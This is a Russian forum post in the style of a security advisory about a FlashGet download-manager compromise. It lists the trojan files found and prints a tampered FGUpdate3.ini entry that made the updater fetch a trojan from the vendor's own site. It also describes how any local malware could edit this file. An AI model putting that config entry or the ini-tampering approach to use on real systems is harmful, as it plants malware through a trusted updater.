Этот хабратопик является информацией для размышления для пользователей популярного клиента-загрузчика FlashGet. Заранее извиняюсь за отсутствие рабочих ссылок, но что-то хабр глючит.
Для поиска
1. Множественные сообщения в саппорт от пользователей о том, что на их компьютерах антивирус стал обнаруживать троянские программы в каталоге FlashGet.
2. Паника на форуме программы Flashget.
3. Основными симптомами является появление в системе файлов с именами:
inapp4.exe inapp5.exe inapp6.exe
Детектируемых Антивирусом Касперского как:
Trojan-Dropper.Win32.Agent.exo Dropper.Win32.Agent.ezo Trojan-Downloader.Win32.Agent.kht 4. Никаких других троянских программ, через которые вышеперечисленные файлы могли попасть в систему, не обнаружилось.
5. Проверка выявила, что кроме троянцев свежую дату создания и модификации имеет файл FGUpdate3.ini (подчекнуты отличия от оригинального файла):
[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020inapp4.exe=1.0.0.1031[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%Ссылка на файл inapp4.exe, являющийся троянцем, ведет на настоящий сайт FlashGet. Именно оттуда он загружался в виде appA.cab.
6. «Уязвимость» существует во всех версиях FlashGet 1.9.xx. Никакой информации об инциденте на сайте FlashGet не обнаружено, полное молчание со стороны разработчиков.
7. Несмотря на то, что на данный момент проблема с взломом сайта FlashGet решена, уязвимость в системе пользовательской безопасности остается. Любая троянская программа может изменить локальный ini-файл FlashGet, заставив его работать как троянец-загрузчик.
8. Кому интересно, гугл знает где находится полный анализ ситуации специалистами Лаборатории Касперского.
P.S. ссылки что-то не вставляются как надо???
